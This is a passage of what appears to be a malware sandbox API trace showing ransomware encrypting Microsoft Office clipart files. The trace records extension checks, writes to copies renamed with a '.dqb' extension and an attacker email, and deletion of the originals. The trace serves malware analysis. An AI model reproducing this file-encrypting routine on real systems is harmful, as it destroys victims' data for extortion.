(lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0055.035] lstrlenW (lpString=".zip") returned 4 [0055.035] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.035] lstrlenW (lpString=".rar") returned 4 [0055.035] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.035] lstrlenW (lpString=".bz2") returned 4 [0055.035] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.035] lstrlenW (lpString=".7z") returned 3 [0055.035] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0055.035] lstrlenW (lpString=".dbf") returned 4 [0055.035] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0055.035] lstrlenW (lpString=".1cd") returned 4 [0055.035] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0055.035] lstrlenW (lpString=".jpg") returned 4 [0055.035] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.035] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.035] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.036] GetLastError () returned 0x0 [0055.036] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x6a0, lpOverlapped=0x0) returned 1 [0055.037] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x6b0, lpOverlapped=0x0) returned 1 [0055.038] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.038] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.038] SetEndOfFile (hFile=0x214) returned 1 [0055.038] CloseHandle (hObject=0x214) returned 1 [0055.038] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.038] SetEndOfFile (hFile=0x240) returned 1 [0055.039] CloseHandle (hObject=0x240) returned 1 [0055.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.039] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf")) returned 1 [0055.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0055.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0055.040] lstrlenW (lpString=".doc") returned 4 [0055.040] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.040] lstrlenW (lpString=".docx") returned 5 [0055.040] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.040] lstrlenW (lpString=".pdf") returned 4 [0055.040] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.040] lstrlenW (lpString=".xls") returned 4 [0055.040] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.040] lstrlenW (lpString=".xlsx") returned 5 [0055.040] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.040] lstrlenW (lpString=".ppt") returned 4 [0055.040] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0055.040] lstrlenW (lpString=".zip") returned 4 [0055.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.040] lstrlenW (lpString=".rar") returned 4 [0055.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.040] lstrlenW (lpString=".bz2") returned 4 [0055.040] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.040] lstrlenW (lpString=".7z") returned 3 [0055.040] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0055.040] lstrlenW (lpString=".dbf") returned 4 [0055.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0055.040] lstrlenW (lpString=".1cd") returned 4 [0055.040] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0055.040] lstrlenW (lpString=".jpg") returned 4 [0055.040] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.041] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.041] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.041] GetLastError () returned 0x0 [0055.041] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x5ec, lpOverlapped=0x0) returned 1 [0055.042] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5f0, lpOverlapped=0x0) returned 1 [0055.043] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.043] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.043] SetEndOfFile (hFile=0x214) returned 1 [0055.044] CloseHandle (hObject=0x214) returned 1 [0055.044] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.044] SetEndOfFile (hFile=0x240) returned 1 [0055.045] CloseHandle (hObject=0x240) returned 1 [0055.045] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.045] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf")) returned 1 [0055.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0055.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0055.045] lstrlenW (lpString=".doc") returned 4 [0055.045] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.045] lstrlenW (lpString=".docx") returned 5 [0055.045] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.045] lstrlenW (lpString=".pdf") returned 4 [0055.045] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.045] lstrlenW (lpString=".xls") returned 4 [0055.045] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.045] lstrlenW (lpString=".xlsx") returned 5 [0055.045] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.045] lstrlenW (lpString=".ppt") returned 4 [0055.045] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0055.046] lstrlenW (lpString=".zip") returned 4 [0055.046] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.046] lstrlenW (lpString=".rar") returned 4 [0055.046] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.046] lstrlenW (lpString=".bz2") returned 4 [0055.046] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.046] lstrlenW (lpString=".7z") returned 3 [0055.046] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0055.046] lstrlenW (lpString=".dbf") returned 4 [0055.046] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0055.046] lstrlenW (lpString=".1cd") returned 4 [0055.046] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0055.046] lstrlenW (lpString=".jpg") returned 4 [0055.046] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.046] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.046] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.047] GetLastError () returned 0x0 [0055.047] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xf92, lpOverlapped=0x0) returned 1 [0055.048] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xfa0, lpOverlapped=0x0) returned 1 [0055.049] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.049] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.049] SetEndOfFile (hFile=0x214) returned 1 [0055.049] CloseHandle (hObject=0x214) returned 1 [0055.049] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.049] SetEndOfFile (hFile=0x240) returned 1 [0055.050] CloseHandle (hObject=0x240) returned 1 [0055.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf")) returned 1 [0055.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0055.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0055.051] lstrlenW (lpString=".doc") returned 4 [0055.051] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.051] lstrlenW (lpString=".docx") returned 5 [0055.051] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.051] lstrlenW (lpString=".pdf") returned 4 [0055.051] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.051] lstrlenW (lpString=".xls") returned 4 [0055.051] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.051] lstrlenW (lpString=".xlsx") returned 5 [0055.051] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.051] lstrlenW (lpString=".ppt") returned 4 [0055.051] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0055.051] lstrlenW (lpString=".zip") returned 4 [0055.051] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.051] lstrlenW (lpString=".rar") returned 4 [0055.051] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.051] lstrlenW (lpString=".bz2") returned 4 [0055.051] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.051] lstrlenW (lpString=".7z") returned 3 [0055.051] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0055.051] lstrlenW (lpString=".dbf") returned 4 [0055.051] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0055.051] lstrlenW (lpString=".1cd") returned 4 [0055.052] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0055.052] lstrlenW (lpString=".jpg") returned 4 [0055.052] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.053] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.053] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.053] GetLastError () returned 0x0 [0055.053] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1f86, lpOverlapped=0x0) returned 1 [0055.358] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1f90, lpOverlapped=0x0) returned 1 [0055.359] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.359] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.359] SetEndOfFile (hFile=0x214) returned 1 [0055.359] CloseHandle (hObject=0x214) returned 1 [0055.359] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.359] SetEndOfFile (hFile=0x240) returned 1 [0055.360] CloseHandle (hObject=0x240) returned 1 [0055.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.360] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf")) returned 1 [0055.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0055.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0055.361] lstrlenW (lpString=".doc") returned 4 [0055.361] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.361] lstrlenW (lpString=".docx") returned 5 [0055.361] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.361] lstrlenW (lpString=".pdf") returned 4 [0055.361] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.361] lstrlenW (lpString=".xls") returned 4 [0055.361] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.361] lstrlenW (lpString=".xlsx") returned 5 [0055.361] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.361] lstrlenW (lpString=".ppt") returned 4 [0055.361] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0055.361] lstrlenW (lpString=".zip") returned 4 [0055.361] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.361] lstrlenW (lpString=".rar") returned 4 [0055.361] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.361] lstrlenW (lpString=".bz2") returned 4 [0055.361] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.361] lstrlenW (lpString=".7z") returned 3 [0055.361] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0055.361] lstrlenW (lpString=".dbf") returned 4 [0055.361] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0055.361] lstrlenW (lpString=".1cd") returned 4 [0055.361] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0055.362] lstrlenW (lpString=".jpg") returned 4 [0055.362] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.362] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=14444) returned 1 [0055.362] CloseHandle (hObject=0x240) returned 1 [0055.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf")) returned 0x20 [0055.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0055.362] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.362] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.363] GetLastError () returned 0x0 [0055.363] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x386c, lpOverlapped=0x0) returned 1 [0055.380] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x3870, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x3870, lpOverlapped=0x0) returned 1 [0055.381] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.382] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.382] SetEndOfFile (hFile=0x214) returned 1 [0055.382] CloseHandle (hObject=0x214) returned 1 [0055.382] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.382] SetEndOfFile (hFile=0x240) returned 1 [0055.383] CloseHandle (hObject=0x240) returned 1 [0055.383] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.383] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf")) returned 1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0055.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0055.388] lstrlenW (lpString=".doc") returned 4 [0055.388] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.388] lstrlenW (lpString=".docx") returned 5 [0055.388] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.388] lstrlenW (lpString=".pdf") returned 4 [0055.388] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.388] lstrlenW (lpString=".xls") returned 4 [0055.388] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.388] lstrlenW (lpString=".xlsx") returned 5 [0055.388] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.388] lstrlenW (lpString=".ppt") returned 4 [0055.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0055.388] lstrlenW (lpString=".zip") returned 4 [0055.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.388] lstrlenW (lpString=".rar") returned 4 [0055.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.388] lstrlenW (lpString=".bz2") returned 4 [0055.388] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.388] lstrlenW (lpString=".7z") returned 3 [0055.388] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0055.388] lstrlenW (lpString=".dbf") returned 4 [0055.388] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0055.388] lstrlenW (lpString=".1cd") returned 4 [0055.388] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0055.388] lstrlenW (lpString=".jpg") returned 4 [0055.389] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.393] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, 